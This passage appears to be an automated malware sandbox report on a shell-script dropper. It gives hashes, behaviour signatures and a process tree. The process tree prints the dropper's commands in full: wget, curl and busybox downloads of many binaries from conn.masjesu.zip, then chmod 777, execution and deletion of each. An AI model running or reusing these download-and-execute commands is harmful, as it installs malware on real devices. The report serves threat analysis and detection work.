Analysis
-
max time kernel
104s -
max time network
133s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/11/2024, 06:30
Static task
static1
Behavioral task
behavioral1
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
-
Size
10KB
-
MD5
2928f83ecf5ea360d714ea8e5f96e2f1
-
SHA1
9ab766d81607421235434062676110c95e811b9a
-
SHA256
839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35
-
SHA512
d2264b6eb7a636120ed44c9c9c588fe733bceb6da5ccd46ceb4bd1aaadbe1195fcd917007a1cf3fbc1e686b9db293bc6263ac28e66375aece5f3606273a25fbf
-
SSDEEP
96:Yz39z39z3g3L3v3Yu9u9u3mhLTJThTEokbhj/n6yc0SqzBFNCFtmFNre+kpB7L29:YMEIxe+4QLKD5Sm9EIxe+o85+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 927 chmod 962 chmod 969 chmod 1018 chmod 800 chmod 872 chmod 1011 chmod 758 chmod 983 chmod 1004 chmod 750 chmod 834 chmod 913 chmod 948 chmod 899 chmod 920 chmod 934 chmod 842 chmod 885 chmod 892 chmod 767 chmod 906 chmod 955 chmod 976 chmod 997 chmod 824 chmod 941 chmod 990 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO 751 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J 759 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV 768 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF 801 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 825 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ 835 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l 844 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB 873 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA 886 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt 893 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI 900 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG 907 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp 914 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M 921 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA 928 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ 935 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l 942 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB 949 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M 956 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt 963 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI 970 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG 977 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp 984 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF 991 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO 998 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J 1005 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV 1012 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 1019 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 947 busybox 1014 wget 1015 curl 762 curl 822 busybox 917 curl 933 busybox 910 curl 951 wget 741 curl 772 wget 848 wget 902 wget 993 wget 1001 curl 1017 busybox 882 curl 903 curl 909 wget 926 busybox 840 busybox 954 busybox 1008 curl 975 busybox 1003 busybox 1007 wget 764 busybox 833 busybox 889 curl 896 curl 973 curl 827 wget 865 busybox 945 curl 959 curl 806 wget 982 busybox 1000 wget 757 busybox 898 busybox 966 curl 761 wget 895 wget 931 curl 994 curl 986 wget 989 busybox 748 busybox 838 curl 952 curl 972 wget 987 curl 1010 busybox 789 busybox 828 curl 877 wget 916 wget 944 wget 958 wget 754 wget 817 curl 855 curl 905 busybox 937 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M curl File opened for modification /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ curl File opened for modification /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF curl File opened for modification /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 curl File opened for modification /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ curl File opened for modification /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF curl File opened for modification /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV curl File opened for modification /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI curl File opened for modification /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA curl File opened for modification /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp curl File opened for modification /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l curl File opened for modification /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt curl File opened for modification /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt curl File opened for modification /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA curl File opened for modification /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp curl File opened for modification /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO curl File opened for modification /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J curl File opened for modification /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI curl File opened for modification /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG curl File opened for modification /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV curl File opened for modification /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l curl File opened for modification /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG curl File opened for modification /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB curl File opened for modification /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB curl File opened for modification /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M curl File opened for modification /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO curl File opened for modification /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J curl File opened for modification /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 curl
Processes
-
/tmp/839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh/tmp/839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:727
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:760
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:761
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:764
-
-
/bin/chmodchmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:770
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:772
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/chmodchmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:822
-
-
/bin/chmodchmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- System Network Configuration Discovery
PID:840
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:884
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:891
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:912
-
-
/bin/chmodchmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:919
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:940
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Reads runtime system information
- System Network Configuration Discovery
